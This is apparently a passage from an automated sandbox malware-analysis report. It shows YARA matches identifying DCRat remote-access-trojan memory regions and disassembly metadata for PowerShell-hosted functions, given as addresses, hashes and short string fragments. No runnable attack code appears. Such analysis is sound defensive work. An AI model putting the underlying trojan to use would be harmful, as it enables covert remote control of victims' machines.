                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3255609581.0000000021160000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.3260501596.0000000022F90000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Executed Functions

                                                                            Function 00007FF848F1AB16 Relevance: .5, Instructions: 474COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2614415842.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5313ce3925c5a1cb8441140e1f61cdbefd0fb70ff80f44b08590fb4d0b83d818
                                                                            • Instruction ID: cdd6f70b715561c4b0e9ea2969cc1a898e275f7583da0d68c13fe6155fd92855
                                                                            • Opcode Fuzzy Hash: 5313ce3925c5a1cb8441140e1f61cdbefd0fb70ff80f44b08590fb4d0b83d818
                                                                            • Instruction Fuzzy Hash: 43F1803091CA8D8FEBA8EF28C8557E937E1FF54350F04426AE84DC7295DB3899858B85
                                                                            Function 00007FF848F1B8C2 Relevance: .5, Instructions: 460COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2614415842.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 056612cd454688318bd06effcbef4091515f149c4efa267a5a10de2cfa2a03f6
                                                                            • Instruction ID: 60690dae2c3cd51c0727695673a9bf18a946a7b9cc5c1550054690f70521f4d8
                                                                            • Opcode Fuzzy Hash: 056612cd454688318bd06effcbef4091515f149c4efa267a5a10de2cfa2a03f6
                                                                            • Instruction Fuzzy Hash: 3FE1A130A1CA8D8FEBA8EF28C8557E977E1FB54350F04426ED84DC7295CF78A9458B81
                                                                            Function 00007FF848FE4049 Relevance: .7, Instructions: 668COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2615180789.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2fdb41af49671f8187fd414ab77b6e6aa7b199a629dd9a6ff94c382575e699c
                                                                            • Instruction ID: 8a2b25d345851c3da3ae5cff34a066087bd2840944fa254bae708e301e6fce86
                                                                            • Opcode Fuzzy Hash: c2fdb41af49671f8187fd414ab77b6e6aa7b199a629dd9a6ff94c382575e699c
                                                                            • Instruction Fuzzy Hash: 03220231E0EECA4FE796EB2858652B57BE1EF66290F1801FEC44DC71D3DA1CA8058356
                                                                            Function 00007FF848FE522D Relevance: .4, Instructions: 384COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2615180789.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 917c8ab5bbe5891bcd9ef80ad8eba6f34b9c8053925d59b96b998e4fac918d40
                                                                            • Instruction ID: a7097b791001e9455ea69a0c1bed775870b38125855eada92d63bf020d490469
                                                                            • Opcode Fuzzy Hash: 917c8ab5bbe5891bcd9ef80ad8eba6f34b9c8053925d59b96b998e4fac918d40
                                                                            • Instruction Fuzzy Hash: 66B1F231E0EA8A4FE795EB2858656B97BE1EF5A251F0801FBD04DC71D3DE1CAC048395
                                                                            Function 00007FF848F1C020 Relevance: .3, Instructions: 273COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2614415842.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0ad9af4a188a9ab77ca1e037329adac9c7823d1e7dee10c228b60ab2ef62342e
                                                                            • Instruction ID: 220aa7d8b41198995d8874897ecb6218aee16e36c035562e59cf1d2ec075224e
                                                                            • Opcode Fuzzy Hash: 0ad9af4a188a9ab77ca1e037329adac9c7823d1e7dee10c228b60ab2ef62342e
                                                                            • Instruction Fuzzy Hash: 63812730A1CA494FE788EB1CC495AB5B7E1FF99391F1005BDD08AC32A6EB25EC46C745
                                                                            Function 00007FF848FE41E7 Relevance: .2, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2615180789.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed7d1e28f700ce0b13dada853a066841b30e6c516a6df7c148e7954e62368a7e
                                                                            • Instruction ID: 95d352c9a09b5dd5aac01bc0e736b8a0bb2cf58a2c87fe22f53e71ba66f16153
                                                                            • Opcode Fuzzy Hash: ed7d1e28f700ce0b13dada853a066841b30e6c516a6df7c148e7954e62368a7e
                                                                            • Instruction Fuzzy Hash: 5A41DF31D1EE8A4FF795EB2858652B96AE1FF653A0F5800BED00CC71D2DE1CA840835A
                                                                            Function 00007FF848FE5352 Relevance: .1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2615180789.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d63afd334a41556fe7e08610c861da89389d725c10b809ead7bf55f9b6179342
                                                                            • Instruction ID: d6a6e71de060d383465a78c80cd3972a42a6220bad223a0c042cb2ce85d878f2
                                                                            • Opcode Fuzzy Hash: d63afd334a41556fe7e08610c861da89389d725c10b809ead7bf55f9b6179342
                                                                            • Instruction Fuzzy Hash: 8A31B032D1EA865FF3A5A7281825378A6E1FF09691F9801BAD44DD31D2EE0C7814825A
                                                                            Function 00007FF848F13945 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2614415842.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                            • Instruction ID: 1d263df139ee799e0221237225f3f4c5236a0ef0a202e971a2d53809691abd9b
                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                            • Instruction Fuzzy Hash: 2501677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056EE58AC3695D736E881CB45

                                                                            Executed Functions

                                                                            Function 076093C0 Relevance: 88.6, Strings: 69, Instructions: 2348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$84}l$84}l$84}l$84}l$84}l$84}l$84}l$84}l$84}l$84}l$84}l$84}l$TQbq$TQbq$TQbq$XRbq$XRbq$XRbq$_$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$tP]q$x.pk$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$(cq$(cq$(cq$(cq$-pk
                                                                            • API String ID: 0-2791379304
                                                                            • Opcode ID: 092d64c751f6d0d21f5baa4c871c63641b26b59b1e79ab5995d2417a6a289796
                                                                            • Instruction ID: 27d63bfdf0cecd3458b6fe4bb36a74899603b9550c32836ecab7435a1b409637
                                                                            • Opcode Fuzzy Hash: 092d64c751f6d0d21f5baa4c871c63641b26b59b1e79ab5995d2417a6a289796
                                                                            • Instruction Fuzzy Hash: 5503D4B47003059FCB198FA8C5546ABBBA6AF85350F14C46AD8169B3D1CB35EC46CBE1
                                                                            Function 0760B7E5 Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$x.pk$x.pk$x.pk$-pk$-pk
                                                                            • API String ID: 0-1787651480
                                                                            • Opcode ID: bc78c190702cc0d36d89a0f03a31a2cccb0a0fdf5941bd116c087e498afba446
                                                                            • Instruction ID: 74773e124abcc52c4c3c2f65ff8cfa5b530caf9643930bf6a4e7c74e7a41f54e
                                                                            • Opcode Fuzzy Hash: bc78c190702cc0d36d89a0f03a31a2cccb0a0fdf5941bd116c087e498afba446
                                                                            • Instruction Fuzzy Hash: C2624FB4A002188FDB54DF68C990BEEBBB6EF44304F1085D5D9096B795CB31AE82CF91
                                                                            Function 07602808 Relevance: 15.5, Strings: 12, Instructions: 457COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-78369665
                                                                            • Opcode ID: 4c026cf0cab6a8e0ac7e4594991f94f0379f319bca6255f2d16cba790b2dbac7
                                                                            • Instruction ID: f63b71859e17d941476b68870226da5857d8c41f1b78e169006448f3981fc4ea
                                                                            • Opcode Fuzzy Hash: 4c026cf0cab6a8e0ac7e4594991f94f0379f319bca6255f2d16cba790b2dbac7
                                                                            • Instruction Fuzzy Hash: 42E118B17042068FCB2D8E39856866BBBE5FF85220F1484AAD846CB3D5DB35CD46C7E1
                                                                            Function 0760E178 Relevance: 13.0, Strings: 10, Instructions: 521COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-3776196570
                                                                            • Opcode ID: c22bf79a06bf4cc38fff9cd98467e7cfee1901a37d6dd0887cee98cab5802d8a
                                                                            • Instruction ID: 6056eee534cc89722d4e41066f7d5e703881e8387990af171909f6802dfb0c01
                                                                            • Opcode Fuzzy Hash: c22bf79a06bf4cc38fff9cd98467e7cfee1901a37d6dd0887cee98cab5802d8a
                                                                            • Instruction Fuzzy Hash: FF12D6B5B00215CFC7189B78C590A6BBBF2EF85310F158869D8069B395DB33DC46CBA1
                                                                            Function 07605CA0 Relevance: 10.8, Strings: 8, Instructions: 770COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-3967578428
                                                                            • Opcode ID: e7f19fa3b71c796b90d8be02ab164232aeebcc22fa0e2ef51b3ea242a691865a
                                                                            • Instruction ID: f39f7dd1c630f8f9ab9e82821f2ee82f94c5410d7400b09e9778072cf5cfd9c2
                                                                            • Opcode Fuzzy Hash: e7f19fa3b71c796b90d8be02ab164232aeebcc22fa0e2ef51b3ea242a691865a
                                                                            • Instruction Fuzzy Hash: 8F6283B0A00215CFDB28DF68C990B5BBBB2EF85304F1485A9D51A6B395CB31ED46CF91
                                                                            Function 07607378 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-3967578428
                                                                            • Opcode ID: f202a0eb9d5c5f7031bc1b6c9f00ba30ecbd36e637808f898d302b06203100fa
                                                                            • Instruction ID: e131400777c23d746de574001a4e9254bf2dba0ef43d5e03367eb6634193ab05
                                                                            • Opcode Fuzzy Hash: f202a0eb9d5c5f7031bc1b6c9f00ba30ecbd36e637808f898d302b06203100fa
                                                                            • Instruction Fuzzy Hash: 1DD181B4A102058FDB18DB68C694B9EBBA7EF84304F20C465D9126F395CB75FC46CBA1
                                                                            Function 07600638 Relevance: 7.8, Strings: 6, Instructions: 326COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                            • API String ID: 0-1480752206
                                                                            • Opcode ID: 1900454a5690e56c42a7ed0dabc2b880e6af6c3ec4d443f88f7d4a40e6882b51
                                                                            • Instruction ID: c8aa1b1d824dff1ef0fae1905f19bd2a3dcf0e2829a36c21aa567e556154c140
                                                                            • Opcode Fuzzy Hash: 1900454a5690e56c42a7ed0dabc2b880e6af6c3ec4d443f88f7d4a40e6882b51
                                                                            • Instruction Fuzzy Hash: 44B124B5B04206DFDB188A78D55477BBBE6EFC1311F14846AD80A8B392DB35D842C7E2
                                                                            Function 07604770 Relevance: 6.7, Strings: 5, Instructions: 465COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$tP]q$tP]q$x.pk
                                                                            • API String ID: 0-1112228328
                                                                            • Opcode ID: 610e2805bb663a0ce4f0af03fb7e4b2a618027d315932ed8d9a2579f2f323155
                                                                            • Instruction ID: adc0ccbeb5dee18c238e104e7970e27bdb8a52a7b1cebbc453a87459b5b98f7c
                                                                            • Opcode Fuzzy Hash: 610e2805bb663a0ce4f0af03fb7e4b2a618027d315932ed8d9a2579f2f323155
                                                                            • Instruction Fuzzy Hash: 7902D4B0B002459FD728DB68C591B6BBBE7AF86304F148469DA165B395CF31EC42CBE1
                                                                            Function 0760631B Relevance: 6.6, Strings: 5, Instructions: 387COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$x.pk$x.pk$-pk
                                                                            • API String ID: 0-247895258
                                                                            • Opcode ID: 0637e93571bfd5d24664d7581575a22cc0aa8281311db4bf841f0932616ef140
                                                                            • Instruction ID: 0d00a53a3983b6df407795789c7e1d920990a2234fd7a39c629973c151e54f62
                                                                            • Opcode Fuzzy Hash: 0637e93571bfd5d24664d7581575a22cc0aa8281311db4bf841f0932616ef140
                                                                            • Instruction Fuzzy Hash: A0F192B0A002149FE714DB68CA50F6ABBB7AF84304F1084D5D51A6B795CB71ED86CFA1
                                                                            Function 0760BF08 Relevance: 6.6, Strings: 5, Instructions: 363COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$x.pk$x.pk$-pk
                                                                            • API String ID: 0-247895258
                                                                            • Opcode ID: 3b16e2616bb3b3d1367766743168e6a3147279fd8cc051fa30f9f90266c6ee34
                                                                            • Instruction ID: 41027e5d3baa907240d9bbbbdac99a366e8e27b85431f7cb88b60002392cda1c
                                                                            • Opcode Fuzzy Hash: 3b16e2616bb3b3d1367766743168e6a3147279fd8cc051fa30f9f90266c6ee34
                                                                            • Instruction Fuzzy Hash: C7E192B0A002149FD714DF68CA94BAE7BA7EF84704F1084A5D9096F795CB71EE82CF91
                                                                            Function 0760735A Relevance: 6.5, Strings: 5, Instructions: 268COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-86929144
                                                                            • Opcode ID: a156b8ae64e0db5516a2213a8bdc2751c8e63f8d5954f94fe05a816442d9fd5f
                                                                            • Instruction ID: 13e117cd5e6fe7c76740342686cfea2c83b8d149088d06602385917fdf4e8eae
                                                                            • Opcode Fuzzy Hash: a156b8ae64e0db5516a2213a8bdc2751c8e63f8d5954f94fe05a816442d9fd5f
                                                                            • Instruction Fuzzy Hash: 6EB17EB4A102058FDB18DF68C694B9EBBB2EF84304F24C459D9126B395CB35F846CBA1
                                                                            Function 0760AD18 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$x.pk$-pk
                                                                            • API String ID: 0-2955075743
                                                                            • Opcode ID: c9e4503b2b32ded4d81d8cad626083518bf7f717b98feee7f845e8bf9b785314
                                                                            • Instruction ID: 477ce010e2f6de12883430d9e77170802bb115a8b29374c6521ea9f4090cde66
                                                                            • Opcode Fuzzy Hash: c9e4503b2b32ded4d81d8cad626083518bf7f717b98feee7f845e8bf9b785314
                                                                            • Instruction Fuzzy Hash: CFC16EF4A002059FDB18CFA4CA90BAFB7B3AF84744F14C559D9166B794CB31AC46CB91
                                                                            Function 07603001 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$tP]q
                                                                            • API String ID: 0-341419813
                                                                            • Opcode ID: 2544c01a6459572bee75f7d5f28a23860259631ab39b3a974c9649d74b9db92f
                                                                            • Instruction ID: d0d912170ed59d03ea2a8310918db00b38a8a79ff0b21f1c079b8b5b1e098c2f
                                                                            • Opcode Fuzzy Hash: 2544c01a6459572bee75f7d5f28a23860259631ab39b3a974c9649d74b9db92f
                                                                            • Instruction Fuzzy Hash: 9751D4B060A3859FC7168B65C864A26BFB1AF46201F19C4EFD446CF3D3C6369C46C7A1
                                                                            Function 07600619 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q
                                                                            • API String ID: 0-127220927
                                                                            • Opcode ID: 11ab7ee8bed0bdaedbdbfead019523c8cf47a4cdc69600092f08644bcc8e92c0
                                                                            • Instruction ID: 1ad2830c0fa4c2f6217efdbe748189935889b6934c9ff9293f69203f03f9292c
                                                                            • Opcode Fuzzy Hash: 11ab7ee8bed0bdaedbdbfead019523c8cf47a4cdc69600092f08644bcc8e92c0
                                                                            • Instruction Fuzzy Hash: B31184B97193869FD71A8B24D840B62BF72AFC3214B29819BD8459F2D3E6728805C791
                                                                            Function 076008C2 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q
                                                                            • API String ID: 0-1007455737
                                                                            • Opcode ID: efd259db1b0194086ca76fbb6d5a490abf415ebceaf50b84eaeb2a12866c8d13
                                                                            • Instruction ID: 4efd53cc8b509baaa4b582684daa928da5629679f44607d6556f50ffbd72b26d
                                                                            • Opcode Fuzzy Hash: efd259db1b0194086ca76fbb6d5a490abf415ebceaf50b84eaeb2a12866c8d13
                                                                            • Instruction Fuzzy Hash: 538136B27043469FD7194B38885076BBBA5EFC2210F1484ABD49ACB792CB35DC46C7E1
                                                                            Function 0760E157 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: 6f934d29cc4b71040c47af7c0eb507724ed688007085999367395fabc9b056f0
                                                                            • Instruction ID: 4f9b43c26aac2fcdabf467b51fe4ff2c14a9d1ded04237dc60bb38f4096d8140
                                                                            • Opcode Fuzzy Hash: 6f934d29cc4b71040c47af7c0eb507724ed688007085999367395fabc9b056f0
                                                                            • Instruction Fuzzy Hash: 31314DF1B182638FDB296A34454137B7BA19F81610F0508AAD552CF3D2EB27D946C7E2
                                                                            Function 0760779E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.pk
                                                                            • API String ID: 0-1212415395
                                                                            • Opcode ID: a4fb5188cc2c9d9a66cf50ce694dc2e2b0a0b9888e109fc8d041646b199c75ea
                                                                            • Instruction ID: 6f9683e606299429073f0b4f905fdd2067ccb649fbe9355943f302ce14856010
                                                                            • Opcode Fuzzy Hash: a4fb5188cc2c9d9a66cf50ce694dc2e2b0a0b9888e109fc8d041646b199c75ea
                                                                            • Instruction Fuzzy Hash: 5831B7B07402049FE704ABA4CA95FAE7AA7EFC4744F108424E9116F395CE76EC46CBE1
                                                                            Function 07605178 Relevance: .7, Instructions: 741COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89fc843d2b21a484a5b9371c8f738eae829d635cd835ce92aa7f78da7caf2f52
                                                                            • Instruction ID: 62b0b1b40dfc5d8a32b26d2f5634d2ba022cb77be0f06502551db6684d6f510a
                                                                            • Opcode Fuzzy Hash: 89fc843d2b21a484a5b9371c8f738eae829d635cd835ce92aa7f78da7caf2f52
                                                                            • Instruction Fuzzy Hash: 23627FB4A00205CFDB14CBA8C695E5ABBB6EF84304F14C469D9169F396CB72EC46CF91
                                                                            Function 07605164 Relevance: .6, Instructions: 550COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40d52e1c4bfbc710e884254de2c48f8e0c5389ac5e66a2023e61c31474e2e438
                                                                            • Instruction ID: 2e91859abe85d6bf2e764e0d1e032358ec393b2501e08016c876aa110de48fa2
                                                                            • Opcode Fuzzy Hash: 40d52e1c4bfbc710e884254de2c48f8e0c5389ac5e66a2023e61c31474e2e438
                                                                            • Instruction Fuzzy Hash: 21325DB4A00205DFDB14CBA8C695E5ABBB2EF84304F14C459D91AAF396C772EC46CF91
                                                                            Function 076058ED Relevance: .5, Instructions: 483COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84b34dec13622639d9beee7f63144db2c8a1917ea4db356cb4a7d5dfa9e6c30b
                                                                            • Instruction ID: 296744763b209fcb624d7f65dc54f3cd7c01a1b47f59ed2a74b8c11f676ebbfc
                                                                            • Opcode Fuzzy Hash: 84b34dec13622639d9beee7f63144db2c8a1917ea4db356cb4a7d5dfa9e6c30b
